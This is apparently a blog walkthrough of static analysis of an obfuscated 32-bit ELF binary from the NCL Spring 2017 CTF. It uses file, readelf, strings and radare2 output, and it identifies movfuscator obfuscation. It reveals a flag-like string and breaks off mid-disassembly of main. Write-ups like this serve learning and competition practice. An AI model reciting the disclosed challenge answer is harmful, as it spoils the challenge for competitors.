Tuesday, July 4, 2017

Can't Figure Out The Answer To A CTF Challenge? Just Exploit It!

This is more going to be a walkthrough of how I conduct my analysis of an unknown ELF file. I am by no means an expert and appreciate any feedback given. Enjoy!

Some background information to this, the file was provided during the NCL Spring 2017 Postseason competition under the "Enumeration and Exploitation" category.


Static Analysis


First thing's first lets run the file command on it to see exactly what type of file this is.

File Information

root@ggrins:~/Documents/NCL/Instructions Unclear Writeup#file NCL-2017-Spring-InstructionsUnclear-X32
NCL-2017-Spring-InstructionsUnclear-X32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, not stripped
view raw file NCL-2017-Spring-InstructionsUnclear-X32 hosted with ❤ by GitHub
From this we've learned two things..
  1. It's an ELF 32 bit executable in LSB (Least Significant Bit) form.
  2. It's not stripped, meaning it still contains debugging information.

ELF Header

root@ggrins:~/Documents/NCL/Instructions Unclear Writeup# readelf -h NCL-2017-Spring-InstructionsUnclear-X32
ELF Header:
Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
Class: ELF32
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: EXEC (Executable file)
Machine: Intel 80386
Version: 0x1
Entry point address: 0x80483dc
Start of program headers: 52 (bytes into file)
Start of section headers: 10279512 (bytes into file)
Flags: 0x0
Size of this header: 52 (bytes)
Size of program headers: 32 (bytes)
Number of program headers: 6
Size of section headers: 40 (bytes)
Number of section headers: 19
Section header string table index: 18
view raw readelf -h NCL-2017-Spring-InstructionsUnclear-X32 hosted with ❤ by GitHub
A few new interesting points from this.
  1. The entry point is at 0x80483dc (0x080483dc).
  2. The program headers start at 52 bytes and is 32 bytes in size.
  3. The section headers start at 10279512 bytes and is 40 bytes in size.

Section Headers

root@ggrins:~/Documents/NCL/Instructions Unclear Writeup# readelf -S NCL-2017-Spring-InstructionsUnclear-X32
There are 19 section headers, starting at offset 0x9cda58:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
[ 1] .interp PROGBITS 080480f4 0000f4 000013 00 A 0 0 1
[ 2] .hash HASH 08048108 000108 000044 04 A 3 0 4
[ 3] .dynsym DYNSYM 0804814c 00014c 0000c0 10 A 4 1 4
[ 4] .dynstr STRTAB 0804820c 00020c 00007a 00 A 0 0 1
[ 5] .gnu.version VERSYM 08048286 000286 000018 02 A 3 0 2
[ 6] .gnu.version_r VERNEED 080482a0 0002a0 000030 00 A 4 1 4
[ 7] .rel.dyn REL 080482d0 0002d0 000010 08 A 3 0 4
[ 8] .rel.plt REL 080482e0 0002e0 000048 08 AI 3 13 4
[ 9] .plt PROGBITS 08048330 000330 0000ac 04 AX 0 0 16
[10] .text PROGBITS 080483dc 0003dc 010edf 00 AX 0 0 1
[11] .eh_frame PROGBITS 080592bc 0112bc 000000 00 A 0 0 4
[12] .dynamic DYNAMIC 0805af40 011f40 0000c0 08 WA 4 0 4
[13] .got.plt PROGBITS 0805b000 012000 000030 04 WA 0 0 4
[14] .data PROGBITS 0805b030 012030 5a972c 00 WA 0 0 16
[15] .bss NOBITS 08604760 5bb75c 200010 00 WA 0 0 16
[16] .symtab SYMTAB 00000000 5bb75c 207340 10 17 131121 4
[17] .strtab STRTAB 00000000 7c2a9c 20af25 00 0 0 1
[18] .shstrtab STRTAB 00000000 9cd9c1 000094 00 0 0 1
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
L (link order), O (extra OS processing required), G (group), T (TLS),
C (compressed), x (unknown), o (OS specific), E (exclude),
p (processor specific)
view raw readelf -S NCL-2017-Spring-InstructionsUnclear-X32 hosted with ❤ by GitHub
So .text (1), .data (2), and .bss (3) should be loaded into the program at the following address ranges:
  1. 0x080483dc - 0x080592bb
  2. 0x0805b030 - 0x0860475c
  3. 0x08604760 - 0x08804770
Also the symbols table (.symtab) is 2,126,656 bytes. Which is not something that's common, that's absolutely massive.

Program Headers

root@ggrins:~/Documents/NCL/Instructions Unclear Writeup# readelf -l NCL-2017-Spring-InstructionsUnclear-X32
Elf file type is EXEC (Executable file)
Entry point 0x80483dc
There are 6 program headers, starting at offset 52
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000034 0x08048034 0x08048034 0x000c0 0x000c0 R E 0x4
INTERP 0x0000f4 0x080480f4 0x080480f4 0x00013 0x00013 R 0x1
[Requesting program interpreter: /lib/ld-linux.so.2]
LOAD 0x000000 0x08048000 0x08048000 0x112bc 0x112bc R E 0x1000
LOAD 0x011f40 0x0805af40 0x0805af40 0x5a981c 0x7a9830 RW 0x1000
DYNAMIC 0x011f40 0x0805af40 0x0805af40 0x000c0 0x000c0 RW 0x4
GNU_RELRO 0x011f40 0x0805af40 0x0805af40 0x000c0 0x000c0 R 0x1
Section to Segment mapping:
Segment Sections...
00
01 .interp
02 .interp .hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .plt .text
03 .dynamic .got.plt .data .bss
04 .dynamic
05 .dynamic
view raw readelf -l NCL-2017-Spring-InstructionsUnclear-X32 hosted with ❤ by GitHub
So this program contains six segments, of those 2 are LOAD segments which are loadable segments.
The first loadable segment (02) contains .text with the read + execute (R E) flag.
The second (03) contains .data and .bss with read + write (RW) flag.

Time to take a look at the symbols table and...it is indeed massive with a large amount of symbols in the format of "alu_XX", seems like this ELF is obfuscated in some way or another. We'll grep out all of the symbols containing "alu" for the time being to get a better look at the programs symbols.

Symbols Table

root@ggrins:~/Documents/NCL/Instructions Unclear Writeup# readelf -s NCL-2017-Spring-InstructionsUnclear-X32 | grep -v alu
Symbol table '.dynsym' contains 12 entries:
0: 00000000 0 NOTYPE LOCAL DEFAULT UND
1: 08048340 0 FUNC GLOBAL DEFAULT UND strcmp@GLIBC_2.0 (2)
2: 08048350 0 FUNC GLOBAL DEFAULT UND printf@GLIBC_2.0 (2)
3: 08048360 0 FUNC GLOBAL DEFAULT UND fflush@GLIBC_2.0 (2)
4: 08604760 4 OBJECT GLOBAL DEFAULT 15 stderr@GLIBC_2.0 (2)
5: 08048370 0 FUNC GLOBAL DEFAULT UND exit@GLIBC_2.0 (2)
6: 08048380 0 FUNC GLOBAL DEFAULT UND strlen@GLIBC_2.0 (2)
7: 08048390 0 FUNC GLOBAL DEFAULT UND fprintf@GLIBC_2.0 (2)
8: 08604764 4 OBJECT GLOBAL DEFAULT 15 stdout@GLIBC_2.0 (2)
9: 080483a0 0 FUNC GLOBAL DEFAULT UND sprintf@GLIBC_2.0 (2)
10: 080483b0 0 FUNC GLOBAL DEFAULT UND __isoc99_scanf@GLIBC_2.7 (3)
11: 00000000 0 FUNC GLOBAL DEFAULT UND sigaction@GLIBC_2.0 (2)
Symbol table '.symtab' contains 132916 entries:
0: 00000000 0 NOTYPE LOCAL DEFAULT UND
1: 080480f4 0 SECTION LOCAL DEFAULT 1
2: 08048108 0 SECTION LOCAL DEFAULT 2
3: 0804814c 0 SECTION LOCAL DEFAULT 3
4: 0804820c 0 SECTION LOCAL DEFAULT 4
5: 08048286 0 SECTION LOCAL DEFAULT 5
6: 080482a0 0 SECTION LOCAL DEFAULT 6
7: 080482d0 0 SECTION LOCAL DEFAULT 7
8: 080482e0 0 SECTION LOCAL DEFAULT 8
9: 08048330 0 SECTION LOCAL DEFAULT 9
10: 080483dc 0 SECTION LOCAL DEFAULT 10
11: 080592bc 0 SECTION LOCAL DEFAULT 11
12: 0805af40 0 SECTION LOCAL DEFAULT 12
13: 0805b000 0 SECTION LOCAL DEFAULT 13
14: 0805b030 0 SECTION LOCAL DEFAULT 14
15: 08604760 0 SECTION LOCAL DEFAULT 15
16: 00000000 0 FILE LOCAL DEFAULT ABS /tmp/lcc231272.o
17: 08604768 4 OBJECT LOCAL DEFAULT 15 __va_arg_tmp
18: 00000000 0 FILE LOCAL DEFAULT ABS /root/tools/movfuscator/b
19: 00000000 0 NOTYPE LOCAL DEFAULT ABS END
20: 0820458c 0 NOTYPE LOCAL DEFAULT 14 pushpop
21: 0805b4f8 0 NOTYPE LOCAL DEFAULT 14 or_0
22: 0805b500 0 NOTYPE LOCAL DEFAULT 14 or_1
23: 0805b518 0 NOTYPE LOCAL DEFAULT 14 and_0
24: 0805b520 0 NOTYPE LOCAL DEFAULT 14 and_1
25: 0805b538 0 NOTYPE LOCAL DEFAULT 14 xor_0
26: 0805b540 0 NOTYPE LOCAL DEFAULT 14 xor_1
27: 0805b558 0 NOTYPE LOCAL DEFAULT 14 xnor_0
28: 0805b560 0 NOTYPE LOCAL DEFAULT 14 xnor_1
131115: 08204588 0 NOTYPE LOCAL DEFAULT 14 pop_guard
131116: 08404590 0 NOTYPE LOCAL DEFAULT 14 push_guard
131117: 08604640 0 NOTYPE LOCAL DEFAULT 14 no_fault
131118: 00000000 0 FILE LOCAL DEFAULT ABS
131119: 0805af40 0 OBJECT LOCAL DEFAULT 12 _DYNAMIC
131120: 0805b000 0 OBJECT LOCAL DEFAULT 13 _GLOBAL_OFFSET_TABLE_
131137: 0820445c 0 NOTYPE GLOBAL DEFAULT 14 b3
131144: 08604644 0 NOTYPE GLOBAL DEFAULT 14 sa_dispatch
131181: 08048457 0 NOTYPE GLOBAL DEFAULT 10 _start0
131182: 08204570 0 NOTYPE GLOBAL DEFAULT 14 branch_temp
131189: 08048340 0 FUNC GLOBAL DEFAULT UND strcmp@@GLIBC_2.0
131232: 084045b0 0 NOTYPE GLOBAL DEFAULT 14 sesp
131233: 0860460c 0 NOTYPE GLOBAL DEFAULT 14 jmp_r3
131247: 08604604 0 NOTYPE GLOBAL DEFAULT 14 jmp_r1
131249: 08048350 0 FUNC GLOBAL DEFAULT UND printf@@GLIBC_2.0
131262: 08048360 0 FUNC GLOBAL DEFAULT UND fflush@@GLIBC_2.0
131269: 084045a4 0 NOTYPE GLOBAL DEFAULT 14 fp
131286: 08604760 4 OBJECT GLOBAL DEFAULT 15 stderr@@GLIBC_2.0
131350: 08604610 0 NOTYPE GLOBAL DEFAULT 14 jmp_f0
131388: 08604630 0 NOTYPE GLOBAL DEFAULT 14 ext_ret_val
131391: 0860475c 0 NOTYPE GLOBAL DEFAULT 14 _edata
131417: 084045a0 0 NOTYPE GLOBAL DEFAULT 14 sp
131430: 0805b4e8 0 NOTYPE GLOBAL DEFAULT 14 D1
131437: 08204564 0 NOTYPE GLOBAL DEFAULT 14 sf
131494: 0820456c 0 NOTYPE GLOBAL DEFAULT 14 cf
131605: 0805b510 0 NOTYPE GLOBAL DEFAULT 14 and
131623: 08048457 0 NOTYPE GLOBAL DEFAULT 10 master_loop
131632: 084045d0 0 NOTYPE GLOBAL DEFAULT 14 sel_target
131744: 08604620 0 NOTYPE GLOBAL DEFAULT 14 jmp_d1
131804: ffdfffa0 0 NOTYPE GLOBAL DEFAULT ABS pop
131808: 084045e4 0 NOTYPE GLOBAL DEFAULT 14 data_p
131819: 084045e0 0 NOTYPE GLOBAL DEFAULT 14 sel_data
131870: 0805b4c8 0 NOTYPE GLOBAL DEFAULT 14 R2
131876: 0805b4c0 0 NOTYPE GLOBAL DEFAULT 14 R0
131884: 08204580 0 NOTYPE GLOBAL DEFAULT 14 stack_temp
131913: 084045d8 0 NOTYPE GLOBAL DEFAULT 14 target
131916: 0805b4d4 0 NOTYPE GLOBAL DEFAULT 14 F1
131972: 08048370 0 FUNC GLOBAL DEFAULT UND exit@@GLIBC_2.0
132006: 08204450 0 NOTYPE GLOBAL DEFAULT 14 b0
132020: 080483d0 0 NOTYPE GLOBAL DEFAULT 9 dispatch
132021: 08204458 0 NOTYPE GLOBAL DEFAULT 14 b2
132051: 08048380 0 FUNC GLOBAL DEFAULT UND strlen@@GLIBC_2.0
132052: 086046d0 0 NOTYPE GLOBAL DEFAULT 14 sa_loop
132069: 08048390 0 FUNC GLOBAL DEFAULT UND fprintf@@GLIBC_2.0
132072: 0805b550 0 NOTYPE GLOBAL DEFAULT 14 xnor
132082: 08204560 0 NOTYPE GLOBAL DEFAULT 14 zf
132129: 08604600 0 NOTYPE GLOBAL DEFAULT 14 jmp_r0
132133: 08604608 0 NOTYPE GLOBAL DEFAULT 14 jmp_r2
132193: 08804770 0 NOTYPE GLOBAL DEFAULT 15 _end
132215: 080483dc 0 NOTYPE GLOBAL DEFAULT 10 _start
132225: 0805b530 0 NOTYPE GLOBAL DEFAULT 14 xor
132226: 0805b030 14 OBJECT GLOBAL DEFAULT 14 def_not_the_flag
132229: 08604770 0 NOTYPE GLOBAL DEFAULT 15 discard
132244: 08604614 0 NOTYPE GLOBAL DEFAULT 14 jmp_f1
132248: 08048904 54265 FUNC GLOBAL DEFAULT 10 validate
132280: 08604764 4 OBJECT GLOBAL DEFAULT 15 stdout@@GLIBC_2.0
132288: 0860475c 0 NOTYPE GLOBAL DEFAULT 15 __bss_start
132315: 08055cfd 13750 FUNC GLOBAL DEFAULT 10 main
132322: 08204568 0 NOTYPE GLOBAL DEFAULT 14 of
132334: 0805b4f0 0 NOTYPE GLOBAL DEFAULT 14 or
132358: 0805b4e0 0 NOTYPE GLOBAL DEFAULT 14 D0
132386: 084045c8 0 NOTYPE GLOBAL DEFAULT 14 on
132446: 08604634 0 NOTYPE GLOBAL DEFAULT 14 external
132451: ffdfff98 0 NOTYPE GLOBAL DEFAULT ABS push
132493: 08604638 0 NOTYPE GLOBAL DEFAULT 14 fault
132520: 084045f0 0 NOTYPE GLOBAL DEFAULT 14 stack
132554: 084045c0 0 NOTYPE GLOBAL DEFAULT 14 sel_on
132582: 080483a0 0 FUNC GLOBAL DEFAULT UND sprintf@@GLIBC_2.0
132584: 080483b0 0 FUNC GLOBAL DEFAULT UND __isoc99_scanf@@GLIBC_2.7
132654: 08604618 0 NOTYPE GLOBAL DEFAULT 14 jmp_d0
132712: 00000000 0 FUNC GLOBAL DEFAULT UND sigaction@@GLIBC_2.0
132745: 084045cc 0 NOTYPE GLOBAL DEFAULT 14 toggle_execution
132772: 0805b4cc 0 NOTYPE GLOBAL DEFAULT 14 R3
132781: 0805b4c4 0 NOTYPE GLOBAL DEFAULT 14 R1
132815: 0805b4d0 0 NOTYPE GLOBAL DEFAULT 14 F0
132839: 086045f0 0 NOTYPE GLOBAL DEFAULT 14 id
132915: 08204454 0 NOTYPE GLOBAL DEFAULT 14 b1
view raw readelf -s NCL-2017-Spring-InstructionsUnclear-X32 | grep -v alu hosted with ❤ by GitHub
18: 00000000 0 FILE LOCAL DEFAULT ABS /root/tools/movfuscator/b

Seems like the program is using movfuscator to obfuscate the code, which is the reasoning for all of the "alu" symbols. Here's some other symbols that peaked my interest.
  • def_not_the_flag
  • discard
  • validate
  • main
We can now start looking at strings, however, due to it being obfuscated it's pretty obvious there's going to be alot of noise. I couldn't even get all of the strings into a gist without it freezing on me so I cut out most of the redundancies/noise.

Strings

root@ggrins:~/Documents/NCL/Instructions Unclear Writeup#strings NCL-2017-Spring-InstructionsUnclear-X32
/lib/ld-linux.so.2
libc.so.6
libm.so.6
sigaction
exit
strlen
sprintf
strcmp
stderr
fprintf
stdout
fflush
__isoc99_scanf
GLIBC_2.7
GLIBC_2.0
%4F`
%pD
SKY-ALTF-4810
this doesn't seem right... try again
whooooo, you got it!
I guess, uh... type in a passcode:
usage: %s <tid>
/tmp/lcc231272.o
__va_arg_tmp
/root/tools/movfuscator/build//crtd.o
pushpop
def_not_the_flag
discard
validate
and_0
and_1
xor_0
xor_1
xnor_0
xnor_1
alu_add16_0
alu_add16_1
alu_add16_2
alu_add16_3
alu_add16_4
alu_add16_5
alu_add16_6
alu_add16_7
alu_add16_8
alu_add16_9
alu_add16_10
...
alu_add16_131068
alu_add16_131069
alu_add16_131070
alu_add16_131071
alu_cmp_of_0
alu_cmp_of_1
alu_cmp_of_00
alu_cmp_of_01
alu_cmp_of_10
alu_cmp_of_11
alu_cmp_of_000
alu_cmp_of_001
alu_cmp_of_010
alu_cmp_of_011
alu_cmp_of_100
alu_cmp_of_101
alu_cmp_of_110
alu_cmp_of_111
pop_guard
push_guard
no_fault
_DYNAMIC
_GLOBAL_OFFSET_TABLE_
alu_bxor8_210
alu_mul_mul8l_80
alu_band8_56
alu_bxor8_38
alu_bor8_161
alu_eq_238
alu_bor8_169
alu_bor8_124
sa_dispatch
alu_bxor8_152
alu_bor8_20
alu_bor8_26
alu_mul_mul8h_226
alu_eq_213
sprintf@@GLIBC_2.0
alu_bxor8_81
__isoc99_scanf@@GLIBC_2.7
alu_band8_184
alu_mul_mul8h_224
alu_add8l
alu_rshu8_0
alu_c
alu_mul_mul8h_51
alu_bor8_176
toggle_execution
.symtab
.strtab
.shstrtab
.interp
.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.text
.eh_frame
.dynamic
.got.plt
.data
.bss
view raw strings NCL-2017-Spring-InstructionsUnclear-X32 hosted with ❤ by GitHub
Few interesting strings to note:
  1. this doesn't seem right... try again
  2. whooooo, you got it!
  3. I guess, uh... type in a passcode:
  4. usage: %s tid
  5. SKY-ALTF-4810 (This is def_not_the_flag)
Without even running the program we know that you need to run the program with your TID (team identifier) as a parameter. The program will then ask you for an input and then print back whether it's correct or it's not. The flag never gets called or anything but it's still kinda neat.

I'm going to use radare2 as my disassembler to disassemble the main function of the program.

Disassembling Main

root@ggrins:~/Documents/NCL/Instructions Unclear Writeup# r2 NCL-2017-Spring-InstructionsUnclear-X32
[0x080483dc]> pdf@main
;-- main:
/ (fcn) sym.main 1024
| sym.main ();
| 0x08055cfd a1d8454008 mov eax, dword [loc.target] ; [0x84045d8:4]=0 LEA loc.target ; loc.target
| 0x08055d02 bafd5c0588 mov edx, 0x88055cfd
| 0x08055d07 a360442008 mov dword [loc.alu_x], eax ; [0x8204460:4]=0 LEA loc.alu_x ; loc.alu_x
| 0x08055d0c 891564442008 mov dword [loc.alu_y], edx ; [0x8204464:4]=0 LEA loc.alu_y ; loc.alu_y
| 0x08055d12 b800000000 mov eax, 0
| 0x08055d17 b900000000 mov ecx, 0
| 0x08055d1c ba00000000 mov edx, 0
| 0x08055d21 a060442008 mov al, byte [loc.alu_x] ; [0x8204460:1]=0 LEA loc.alu_x ; loc.alu_x
| 0x08055d26 8b0c8570ea05. mov ecx, dword [eax*4 + loc.alu_eq] ; [0x805ea70:4]=0x805ee74 loc.alu_eq_0 LEA loc.alu_eq ; "t...u...v...w...x...y...z...{...|...}...~................................" @ 0x805ea70
| 0x08055d2d 8a1564442008 mov dl, byte [loc.alu_y] ; [0x8204464:1]=0 LEA loc.alu_y ; loc.alu_y
| 0x08055d33 8a1411 mov dl, byte [ecx + edx]
| 0x08055d36 891550442008 mov dword [loc.b0], edx ; [0x8204450:4]=0 LEA loc.b0 ; loc.b0
| 0x08055d3c a061442008 mov al, byte [0x8204461] ; [0x8204461:1]=0
| 0x08055d41 8b0c8570ea05. mov ecx, dword [eax*4 + loc.alu_eq] ; [0x805ea70:4]=0x805ee74 loc.alu_eq_0 LEA loc.alu_eq ; "t...u...v...w...x...y...z...{...|...}...~................................" @ 0x805ea70
| 0x08055d48 8a1565442008 mov dl, byte [0x8204465] ; [0x8204465:1]=0
| 0x08055d4e 8a1411 mov dl, byte [ecx + edx]
| 0x08055d51 891554442008 mov dword [loc.b1], edx ; [0x8204454:4]=0 LEA loc.b1 ; loc.b1
| 0x08055d57 a062442008 mov al, byte [0x8204462] ; [0x8204462:1]=0
| 0x08055d5c 8b0c8570ea05. mov ecx, dword [eax*4 + loc.alu_eq] ; [0x805ea70:4]=0x805ee74 loc.alu_eq_0 LEA loc.alu_eq ; "t...u...v...w...x...y...z...{...|...}...~................................" @ 0x805ea70
| 0x08055d63 8a1566442008 mov dl, byte [0x8204466] ; [0x8204466:1]=0
| 0x08055d69 8a1411 mov dl, byte [ecx + edx]
| 0x08055d6c 891558442008 mov dword [loc.b2], edx ; [0x8204458:4]=0 LEA loc.b2 ; loc.b2
| 0x08055d72 a063442008 mov al, byte [0x8204463] ; [0x8204463:1]=0
| 0x08055d77 8b0c8570ea05. mov ecx, dword [eax*4 + loc.alu_eq] ; [0x805ea70:4]=0x805ee74 loc.alu_eq_0 LEA loc.alu_eq ; "t...u...v...w...x...y...z...{...|...}...~................................" @ 0x805ea70
| 0x08055d7e 8a1567442008 mov dl, byte [0x8204467] ; [0x8204467:1]=0
| 0x08055d84 8a1411 mov dl, byte [ecx + edx]
| 0x08055d87 89155c442008 mov dword [loc.b3], edx ; [0x820445c:4]=0 LEA loc.b3 ; loc.b3
| 0x08055d8d a150442008 mov eax, dword [loc.b0] ; [0x8204450:4]=0 LEA loc.b0 ; loc.b0
| 0x08055d92 8b1554442008 mov edx, dword [loc.b1] ; [0x8204454:4]=0 LEA loc.b1 ; loc.b1
| 0x08055d98 8b048510b505. mov eax, dword [eax*4 + loc.and] ; [0x805b510:4]=0x805b518 loc.and_0 LEA loc.and ; loc.and
| 0x08055d9f 8b0490 mov eax, dword [eax + edx*4]
| 0x08055da2 a350442008 mov dword [loc.b0], eax ; [0x8204450:4]=0 LEA loc.b0 ; loc.b0
| 0x08055da7 a150442008 mov eax, dword [loc.b0] ; [0x8204450:4]=0 LEA loc.b0 ; loc.b0
| 0x08055dac 8b1558442008 mov edx, dword [loc.b2] ; [0x8204458:4]=0 LEA loc.b2 ; loc.b2
| 0x08055db2 8b048510b505. mov eax, dword [eax*4 + loc.and] ; [0x805b510:4]=0x805b518 loc.and_0 LEA loc.and ; loc.and
| 0x08055db9 8b0490 mov eax, dword [eax + edx*4]
| 0x08055dbc a350442008 mov dword [loc.b0], eax ; [0x8204450:4]=0 LEA loc.b0 ; loc.b0
| 0x08055dc1 a150442008 mov eax, dword [loc.b0] ; [0x8204450:4]=0 LEA loc.b0 ; loc.b0
| 0x08055dc6 8b155c442008 mov edx, dword [loc.b3] ; [0x820445c:4]=0 LEA loc.b3 ; loc.b3
| 0x08055dcc 8b048510b505. mov eax, dword [eax*4 + loc.and] ; [0x805b510:4]=0x805b518 loc.and_0 LEA loc.and ; loc.and
| 0x08055dd3 8b0490 mov eax, dword [eax + edx*4]
| 0x08055dd6 a350442008 mov dword [loc.b0], eax ; [0x8204450:4]=0 LEA loc.b0 ; loc.b0
| 0x08055ddb a150442008 mov eax, dword [loc.b0] ; [0x8204450:4]=0 LEA loc.b0 ; loc.b0
| 0x08055de0 a350442008 mov dword [loc.b0], eax ; [0x8204450:4]=0 LEA loc.b0 ; loc.b0
| 0x08055de5 8b0d50442008 mov ecx, dword [loc.b0] ; [0x8204450:4]=0 LEA loc.b0 ; loc.b0
| 0x08055deb c705e4454008. mov dword [loc.data_p], 0x805b4c0 ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
| 0x08055df5 8b048de04540. mov eax, dword [ecx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x08055dfc 8b1500466008 mov edx, dword [loc.jmp_r0] ; [0x8604600:4]=0 LEA loc.jmp_r0 ; loc.jmp_r0
| 0x08055e02 8910 mov dword [eax], edx
| 0x08055e04 c705e4454008. mov dword [loc.data_p], 0x805b4c4 ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
| 0x08055e0e 8b048de04540. mov eax, dword [ecx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x08055e15 8b1504466008 mov edx, dword [loc.jmp_r1] ; [0x8604604:4]=0 LEA loc.jmp_r1 ; loc.jmp_r1
| 0x08055e1b 8910 mov dword [eax], edx
| 0x08055e1d c705e4454008. mov dword [loc.data_p], 0x805b4c8 ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
| 0x08055e27 8b048de04540. mov eax, dword [ecx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x08055e2e 8b1508466008 mov edx, dword [loc.jmp_r2] ; [0x8604608:4]=0 LEA loc.jmp_r2 ; loc.jmp_r2
| 0x08055e34 8910 mov dword [eax], edx
| 0x08055e36 c705e4454008. mov dword [loc.data_p], 0x805b4cc ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
| 0x08055e40 8b048de04540. mov eax, dword [ecx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x08055e47 8b150c466008 mov edx, dword [loc.jmp_r3] ; [0x860460c:4]=0 LEA loc.jmp_r3 ; loc.jmp_r3
| 0x08055e4d 8910 mov dword [eax], edx
| 0x08055e4f c705e4454008. mov dword [loc.data_p], 0x805b4d0 ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
| 0x08055e59 8b048de04540. mov eax, dword [ecx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x08055e60 8b1510466008 mov edx, dword [loc.jmp_f0] ; [0x8604610:4]=0 LEA loc.jmp_f0 ; loc.jmp_f0
| 0x08055e66 8910 mov dword [eax], edx
| 0x08055e68 c705e4454008. mov dword [loc.data_p], 0x805b4d4 ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
| 0x08055e72 8b048de04540. mov eax, dword [ecx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x08055e79 8b1514466008 mov edx, dword [loc.jmp_f1] ; [0x8604614:4]=0 LEA loc.jmp_f1 ; loc.jmp_f1
| 0x08055e7f 8910 mov dword [eax], edx
| 0x08055e81 c705e4454008. mov dword [loc.data_p], 0x805b4e0 ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
| 0x08055e8b 8b048de04540. mov eax, dword [ecx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x08055e92 8b1518466008 mov edx, dword [loc.jmp_d0] ; [0x8604618:4]=0 LEA loc.jmp_d0 ; loc.jmp_d0
| 0x08055e98 8910 mov dword [eax], edx
| 0x08055e9a 8b151c466008 mov edx, dword [0x860461c] ; [0x860461c:4]=0
| 0x08055ea0 895004 mov dword [eax + 4], edx
| 0x08055ea3 c705e4454008. mov dword [loc.data_p], 0x805b4e8 ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
| 0x08055ead 8b048de04540. mov eax, dword [ecx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x08055eb4 8b1520466008 mov edx, dword [loc.jmp_d1] ; [0x8604620:4]=0 LEA loc.jmp_d1 ; loc.jmp_d1
| 0x08055eba 8910 mov dword [eax], edx
| 0x08055ebc 8b1524466008 mov edx, dword [0x8604624] ; [0x8604624:4]=0
| 0x08055ec2 895004 mov dword [eax + 4], edx
| 0x08055ec5 a150442008 mov eax, dword [loc.b0] ; [0x8204450:4]=0 LEA loc.b0 ; loc.b0
| 0x08055eca 8b0485c04540. mov eax, dword [eax*4 + loc.sel_on] ; [0x84045c0:4]=0x8604770 loc.discard LEA loc.sel_on ; "pG`..E@." @ 0x84045c0
| 0x08055ed1 c70001000000 mov dword [eax], 1
| 0x08055ed7 a1a4454008 mov eax, dword [loc.fp] ; [0x84045a4:4]=0x86045f0 loc.id LEA loc.fp ; loc.fp
| 0x08055edc a380452008 mov dword [loc.stack_temp], eax ; [0x8204580:4]=0 LEA loc.stack_temp ; loc.stack_temp
| 0x08055ee1 b8a0454008 mov eax, loc.sp ; loc.sp
| 0x08055ee6 8b15c8454008 mov edx, dword [loc.on] ; [0x84045c8:4]=0 LEA loc.on ; loc.on
| 0x08055eec a3e4454008 mov dword [loc.data_p], eax ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
| 0x08055ef1 8b0495e04540. mov eax, dword [edx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x08055ef8 8b15a0454008 mov edx, dword [loc.sp] ; [0x84045a0:4]=0x86045f0 loc.id LEA loc.sp ; loc.sp
| 0x08055efe 8b9298ffdfff mov edx, dword [edx - 0x200068]
| 0x08055f04 8910 mov dword [eax], edx
| 0x08055f06 a1a0454008 mov eax, dword [loc.sp] ; [0x84045a0:4]=0x86045f0 loc.id LEA loc.sp ; loc.sp
| 0x08055f0b 8b15c8454008 mov edx, dword [loc.on] ; [0x84045c8:4]=0 LEA loc.on ; loc.on
| 0x08055f11 a3e4454008 mov dword [loc.data_p], eax ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
| 0x08055f16 8b0495e04540. mov eax, dword [edx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x08055f1d 8b1580452008 mov edx, dword [loc.stack_temp] ; [0x8204580:4]=0 LEA loc.stack_temp ; loc.stack_temp
| 0x08055f23 8910 mov dword [eax], edx
| 0x08055f25 a1c4b40508 mov eax, dword [loc.R1] ; [0x805b4c4:4]=0 LEA loc.R1 ; loc.R1
| 0x08055f2a a380452008 mov dword [loc.stack_temp], eax ; [0x8204580:4]=0 LEA loc.stack_temp ; loc.stack_temp
| 0x08055f2f b8a0454008 mov eax, loc.sp ; loc.sp
| 0x08055f34 8b15c8454008 mov edx, dword [loc.on] ; [0x84045c8:4]=0 LEA loc.on ; loc.on
| 0x08055f3a a3e4454008 mov dword [loc.data_p], eax ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
